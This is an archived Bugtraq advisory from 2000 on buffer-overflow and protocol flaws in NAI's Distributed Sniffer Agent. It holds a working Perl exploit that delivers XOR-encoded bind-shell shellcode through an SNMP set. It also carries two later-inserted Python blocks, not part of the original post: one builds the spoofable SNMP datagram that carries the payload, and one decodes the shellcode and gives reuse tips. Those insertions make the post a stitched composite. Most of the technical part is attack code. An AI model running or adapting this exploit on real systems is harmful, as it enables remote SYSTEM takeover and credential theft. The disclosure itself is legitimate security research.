Bugtraq mailing list archives

Remotely exploitable buffer overflow in NAI's Distributed Sniffer Agent


From: Kevin Start <kevin_start () HUSHMAIL COM>
Date: Thu, 2 Nov 2000 15:30:48 -0700


Bugtraq.

This 'advisory' details a number of problems with NAI's sniffer product.
They have fixed the problems in current versions on the sly, so I have foregone
notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon
today, so 'all is fair in love and war'; at least MS had the dignity to announce
their fixes.

As a side note, I was working with the vulnhelp team at SecurityFocus but
have decided to just post this, given NAI's recent decision to throw rocks
in this great glass house....




Date Published: November 2, 2000

Advisory ID: N/A

Bugtraq ID: N/A

CVE CAN: None currently assigned.

Title: Remotely exploitable buffer overflow and protocol vulnerabilities
in NAI's Distributed Sniffer Agent

Class: Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: Yes

Locally Exploitable: Yes

Vulnerability Description:

NAI's Distributed Sniffer Agent can be overflowed remotely to gain
SYSTEM privilege.  Additional vulnerabilities exist in the management
protocol that allow an attacker to recover logins and passwords, take
control of the agent, and delete logs.

Vulnerable Packages/Systems:

Systems running the NAI Sniffer Agent. Tested with
Agent version 3.0.10 using Windows NT Workstation 4.0 SP6

Solution/Vendor Information/Workaround:
Fixed in current versions.

Additionally, advisories and information on security issues
of Network Associates products can be obtained from:

http://www.securityfocus.com/bid/1606
http://www.securityfocus.com/bid/1589
etc, etc, etc, etc.

Vendor notified on: Right about now....

Credits:

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories, please mail vulnhelp () securityfocus com.

Technical Description - Exploit/Concept Code:

1. The most severe problem was an overflow during SNMP
writes.  NAI elected to use a single community for both public
and private access, which simplifies brute forcing the community
string: any guess that works for reads also grants writes.  Once
this string has been guessed, shellcode can be written into any
accessible object (sysName, for example).  The buffer is 256 bytes
long with no character restrictions: the value travels as a
length-prefixed SNMP OCTET STRING, so NULs are allowed when
snmpset's hex mode is used to supply the bytes.  This attack can be
launched completely blind with one spoofed UDP packet, since an SNMP
set involves no handshake and the attacker never needs to see the
reply.  SYSTEM privilege can be gained using this method.

2. Authentication was handled using base64-encoded logins and passwords,
so anyone who can see the traffic can recover them.  Dsniff by Dugsong
already includes a module for capturing logins and passwords from the
agent.  Base64 encoding was also used to obfuscate changes to the
agent's user database.


3. All remote access to the agent is handled using UDP.  Once a user
has authenticated to the agent, an attacker can inject his own
spoofed commands.  Full control of the agent can be gained
in this manner.  If the packet generation facility is enabled,
a packet flood can be initiated.

4. All data transferred from the agent is in cleartext, allowing an
attacker to recover data being sniffed on a remote network
segment.

5. Flooding the agent with false login requests can cause system
instability.  A kernel fault was caused during testing.

6. Logs can be deleted remotely, allowing an attacker to delete his
own brute forcing attempts once he is successful.
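Worked illustration of item 1's delivery path, added here and not part of the original post: it builds the SNMPv1 SetRequest datagram that `snmpset HOST COMMUNITY system.sysName.0 x ...` emits, and parses it back the way the receiving agent would. The community string, the sysName.0 OID and the value layout (return address x 80, NOP sled, egg) come from the advisory and the exploit below; the egg bytes in this example are a constructed int3 stand-in, not the real shellcode, and the helper and constant names are mine. The advisory does not say which port the agent listens on; the comment at the end assumes 161, the standard SNMP port.

```python
# Added example (not from the original post): build the SNMPv1 SetRequest
# datagram that "snmpset HOST COMMUNITY system.sysName.0 x ..." emits, and
# parse it back the way a receiving agent would.  The payload is a constructed
# stand-in for the exploit's return-address sled + NOP sled + egg.
import struct

SYSNAME_0 = "1.3.6.1.2.1.1.5.0"   # system.sysName.0 (MIB-II)
TAG_INT, TAG_OCTETS, TAG_OID, TAG_SEQ, TAG_SETREQ = 0x02, 0x04, 0x06, 0x30, 0xA3


def ber_len(n):
    """BER length: one byte below 128, otherwise 0x80|count followed by count bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v):
    """Minimal two's-complement INTEGER (non-negative values are all we need)."""
    return tlv(TAG_INT, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def ber_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])     # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]                      # base-128, high bit = "more follows"
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(TAG_OID, bytes(out))


def snmpv1_setrequest(community, oid, value, request_id=1):
    """Whole SNMPv1 message: version 0, community, SetRequest-PDU, one varbind.
    `value` is sent as an OCTET STRING, i.e. length-prefixed: NUL bytes pass through."""
    varbind = tlv(TAG_SEQ, ber_oid(oid) + tlv(TAG_OCTETS, value))
    header = ber_int(request_id) + ber_int(0) + ber_int(0)   # request-id, error-status, error-index
    pdu = tlv(TAG_SETREQ, header + tlv(TAG_SEQ, varbind))
    return tlv(TAG_SEQ, ber_int(0) + tlv(TAG_OCTETS, community.encode()) + pdu)


# --- receiver side: what the agent sees --------------------------------------

def parse_tlv(buf, pos=0):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def oid_to_dotted(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def decode_setrequest(pkt):
    """Return (community, dotted OID, value) from a single-varbind SetRequest."""
    _, msg, _ = parse_tlv(pkt)
    _, _, p = parse_tlv(msg)                    # version
    _, community, p = parse_tlv(msg, p)
    ptag, pdu, _ = parse_tlv(msg, p)
    if ptag != TAG_SETREQ:
        raise ValueError("not a SetRequest")
    p = 0
    for _ in range(3):                          # request-id, error-status, error-index
        _, _, p = parse_tlv(pdu, p)
    _, vbl, _ = parse_tlv(pdu, p)
    _, vb, _ = parse_tlv(vbl)
    _, oid, p = parse_tlv(vb)
    _, value, _ = parse_tlv(vb, p)
    return community.decode(), oid_to_dotted(oid), value


def build_exploit_style_payload(ret=b"\x00\xc7\x12\x00", ret_count=80, nops=200, egg=b"\xcc" * 8):
    """Same layout as the exploit's value: return address x N, NOP sled, egg.
    The default egg is a constructed int3 stand-in, not the real shellcode."""
    return ret * ret_count + b"\x90" * nops + egg


if __name__ == "__main__":
    payload = build_exploit_style_payload()
    pkt = snmpv1_setrequest("public", SYSNAME_0, payload)
    community, oid, value = decode_setrequest(pkt)
    print(f"{len(pkt)}-byte datagram, community={community!r}, oid={oid}, "
          f"value={len(value)} bytes, NULs in value={value.count(0)}")
    # To emit it: send pkt as one UDP datagram to the agent's SNMP port
    # (the advisory gives no port; 161 is the standard one).  No handshake,
    # so the source address can be anything.
```

The parse-back shows the two properties the advisory relies on: the value is an OCTET STRING with an explicit length, so the 160 NUL bytes in the return-address sled arrive intact, and the whole exchange is one unauthenticated datagram guarded by nothing but a community string that the agent shares between read and write.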

--- EXPLOIT ---

#!/usr/bin/perl

# exploit for NAI Sniffer Agent 3.0.10
# Silently patched in later versions, although customers
# were not notified.  No workaround was ever released.
#
# Delivers the egg below as an SNMP set of system.sysName.0 (hex
# mode, so NUL bytes survive), overflowing the 256-byte buffer.

$xoredport="88 88 ";  # bind-shell port 4369 (0x1111), XORed with 0x99
                      # like the rest of the egg's data so it holds no NULs

$egg ="
eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
99 eb fc fa ef 99 9b 99  $xoredport 99 99 99 99
99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
ff ff ff ff ";

$offset = "00 c7 12 00 ";   # return address 0x0012c700, little-endian
                            # (NT4 SP6 stack; expected to land in the NOP sled)

$snmpset = "/usr/bin/snmpset";   # UCD-SNMP snmpset
$community = "public";           # the single read/write community
$objid = "system.sysName.0";
$offcount = 80;                  # 80 x 4 = 320 bytes of return address
$nopcount = 200;                 # NOP sled in front of the egg

# value = return addresses, NOP sled, egg; double-quoted for the shell
@execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg,"
\"");

$host="HOST TO 0WN";

# 'x' = hex string type.  The original post interpolated @sploitstring
# here, a variable that is never assigned; @execstring is the one built above.
exec ("$snmpset $host $community $objid x @execstring");
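What the egg actually does, as an added example that is not part of the original post: the hex below is `$egg` from the script above with `$xoredport` expanded to `88 88`, and the decoding reproduces the stub's own logic (`f2 af` scans forward from wherever edi points for 0xffffffff, `59 b1 c6` sets ecx to 198, `80 30 99` / `e2 fa` XOR each byte with 0x99 walking backwards from the marker). The field names in the result dict and the helper names are mine; everything else is read off the bytes.

```python
# Added example (not from the original post): decode the string table that
# the exploit's egg carries, using the same constants the stub's own decoder
# uses.  EGG_HEX is $egg from the Perl script with $xoredport = "88 88".
import struct

EGG_HEX = """
eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
99 eb fc fa ef 99 9b 99 88 88 99 99 99 99
99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
ff ff ff ff
"""
EGG = bytes.fromhex(EGG_HEX)

XOR_KEY = 0x99                 # "80 30 99": xor byte [eax], 0x99
DECODE_LEN = 0xC6              # "b1 c6":    mov cl, 0xc6  -> 198 bytes
MARKER = b"\xff\xff\xff\xff"   # "f2 af":    repne scasd looking for eax = -1


def decode_table(egg=EGG):
    """XOR-decode the 198 bytes that end at the 0xffffffff marker, as the stub does.
    Returns (offset of the encoded table within the egg, decoded bytes)."""
    end = egg.index(MARKER) + len(MARKER)        # edi after repne scasd
    start = end - DECODE_LEN
    return start, bytes(b ^ XOR_KEY for b in egg[start:end])


def summarize(egg=EGG):
    """Split the decoded table: NUL-terminated names, a sockaddr_in, the command."""
    start, table = decode_table(egg)
    names, pos = [], 0
    while table[pos] >= 0x20:                    # printable => another C string
        end = table.index(b"\x00", pos)
        names.append(table[pos:end].decode("ascii"))
        pos = end + 1
    sockaddr = table[pos:pos + 16]               # struct sockaddr_in, 16 bytes
    family = struct.unpack("<H", sockaddr[:2])[0]    # sin_family, host order
    port = struct.unpack("!H", sockaddr[2:4])[0]     # sin_port, network order
    addr = ".".join(str(b) for b in sockaddr[4:8])   # sin_addr
    pos += 16
    command = table[pos:table.index(b"\x00", pos)].decode("ascii")
    return {
        "table_offset": start, "names": names, "family": family,
        "port": port, "bind_addr": addr, "command": command,
        "marker_after_decode": table[-4:],       # the marker is XORed too
    }


if __name__ == "__main__":
    info = summarize()
    print(f"egg is {len(EGG)} bytes; encoded table starts at offset {info['table_offset']}")
    print("imports:", ", ".join(info["names"]))
    print(f"bind {info['bind_addr']}:{info['port']} (AF {info['family']}), run {info['command']!r}")
```

Decoded, the table is the import list of a bind shell: KERNEL32 and WSOCK32 names (CreatePipe, GetStartupInfoA, CreateProcessA, PeekNamedPipe, ReadFile, WriteFile, socket, bind, listen, accept, send, recv, and so on), a sockaddr_in with AF_INET, port 4369 and address 0.0.0.0, and the command cmd.exe; the XOR key is what lets all those NUL-terminated strings ride inside the egg without a literal NUL. Two things to note before reusing any of it: the stub calls a fixed address (`bb 77 be 6b 77 ff d3`, mov ebx,0x776bbe77; call ebx), which ties it to the NT4 SP6 build the advisory says was tested, and the marker scan starts from whatever edi holds when the overflowed function returns, so the stub depends on that register pointing into the egg.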

